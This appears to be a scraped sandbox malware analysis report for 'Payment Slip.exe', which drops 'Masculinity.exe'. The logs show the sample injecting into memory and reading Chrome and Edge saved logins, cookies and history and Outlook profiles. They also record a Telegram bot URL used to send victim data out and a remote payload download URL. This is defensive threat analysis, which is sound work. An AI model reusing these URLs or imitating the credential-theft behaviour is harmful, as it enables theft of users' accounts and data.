Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Payment Slip.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Payment Slip.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Masculinity.exe base: 1700000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Masculinity.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Masculinity.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
108.167.181.251	www.reap.skyestates.com.mt	United States	46606	UNIFIEDLAYER-AS-1US	false
66.29.159.53	smtp.privateemail.com	United States	19538	ADVANTAGECOMUS	true

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin	false	Avira URL Cloud: safe	unknown

ID:	1481491
Product:	CloudBasic
Start time:	10:03:18
Start date:	25.07.2024
Sample:	Payment Slip.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	db9b31da65d0ef913176d54ceb4cf5f4
SHA1:	5878f8c4e6b82ef6c9d32c020bb9d5898e973e96
SHA256:	893b893178434a4273089c619b1acaefab661c6d647d832a6375fb53e2753669
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report Payment Slip.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Payment Slip.exe

Malware Threat Intel
Provided by

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Temp\Masculinity.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	DB9B31DA65D0EF913176D54CEB4CF5F4	5878F8C4E6B82EF6C9D32C020BB9D5898E973E96	893B893178434A4273089C619B1ACAEFAB661C6D647D832A6375FB53E2753669
C:\Users\user\AppData\Local\Temp\Masculinity.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzkdiry2.t22.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm21usp2.sdq.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Krnemlk.Cig255	data	F8435A0869A068FBFDEEB94CD74F40B0	AB56FCE05AB0038D7420A19795F3631EDF9D7943	747415DC76E298B9AB61608E415000772F0B9FB10FC98AF8F2D9391B9D08AD8E
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San	ASCII text, with very long lines (65536), with no line terminators	5F8EB18EF6FCE8E3FC026B2F93007A65	D5BB91CD2806BE9B97218CBBE24C5D04A211CC17	AC3795FD2314BB76E57E50C7FDE085630BD9DDD66698E8870535962A368C72B5
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl	data	B9E5947712FA407B58A8527B52CE050E	9FD16F2F3569FF478C591E16A03EF65F7D63E57E	30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\lokalplanrammes.sus	data	D0A61E12A7A27A4B719AB0C4B9F57B88	55A349C760BA7AF05C54934924E2C0289BB3FF24	243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\ondskabsfuldhedernes.txt	ASCII text, with very long lines (367), with CRLF line terminators	9524154CFD936F21394F74D000856732	3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3	8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
C:\Users\user\AppData\Local\Temp\nsw288F.tmp	data	981FB438C385528AA68E93252C8E410C	24B18B7E3E2CFBEE8C8790D950570DD420217654	A85235CDD2E9FC521C9E340DB3D024E08AC62E02AC875364889186CB6C935D2B